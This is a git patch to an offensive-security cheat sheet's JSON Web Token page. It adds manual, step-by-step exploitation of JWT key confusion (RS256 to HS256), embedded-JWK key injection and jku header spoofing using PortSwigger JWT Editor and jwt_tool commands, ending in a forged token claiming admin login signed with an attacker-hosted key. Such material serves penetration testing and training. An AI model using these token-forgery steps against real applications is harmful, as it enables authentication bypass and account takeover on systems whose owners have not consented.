From 579207aa8fd54cb044a6ca8e27a0a3121bdcc4c7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 12 Mar 2023 18:02:29 +0100 Subject: [PATCH] JWT jku and jwks - manual exploitation --- JSON Web Token/README.md | 57 +++++++++++++++++++++++++++++++++------- 1 file changed, 47 insertions(+), 10 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9332c94..c30451a 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -12,7 +12,7 @@ - [JWT Signature](#jwt-signature) - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) - - [JWT Signature - None algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) + - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431) - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) - [JWT Secret](#jwt-secret) @@ -152,7 +152,7 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh ``` -### JWT Signature - None algorithm (CVE-2015-9235) +### JWT Signature - None Algorithm (CVE-2015-9235) JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. @@ -207,6 +207,17 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') ```ps1 python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem ``` +* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd) + 1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json` + 2. Load it in the JWT Editor Keys tab, click `New RSA Key`. + 3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}` + 4. Select the PEM radio button and copy the resulting PEM key. + 5. Go to the Decoder tab and Base64-encode the PEM. + 6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format. + 7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied. + 8. Edit the JWT token alg to `HS256` and the data. + 9. Click `Sign` and keep the option: `Don't modify header` + * Manually using the following steps to edit an RS256 JWT token into an HS256 1. Convert our public key (key.pem) into HEX with this command. @@ -243,9 +254,14 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256') **Exploit**: -```ps1 -python3 jwt_tool.py [JWT_HERE] -X i -``` +* Using [ticarpi/jwt_tool] + ```ps1 + python3 jwt_tool.py [JWT_HERE] -X i + ``` +* Using [portswigger/JWT Editor](#) + 1. Add a `New RSA key` + 2. In the JWT's Repeater tab, edit data + 3. `Attack` > `Embedded JWK` **Deconstructed**: ```json @@ -432,17 +448,38 @@ It is sometimes exposed publicly via a standard endpoint: * `/api/keys` * `/api/v1/keys` +You should create your own key pair for this attack and host it. It should look like that: + +```json +{ + "keys": [ + { + "kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54", + "kty": "RSA", + "e": "AQAB", + "n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ" + } + ] +} +``` + **Exploit**: -```ps1 -python3 jwt_tool.py JWT_HERE -X s -python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json -``` +* Using [ticarpi/jwt_tool] + ```ps1 + python3 jwt_tool.py JWT_HERE -X s + python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json + ``` +* Using [portswigger/JWT Editor](#) + 1. Generate a new RSA key and host it + 2. Edit JWT's data + 3. Replace the `kid` header with the one from your JWKS + 4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked) **Deconstructed**: ```json -{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json"}. +{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}. {"login":"admin"}. [Signed with new Private key; Public key exported] ```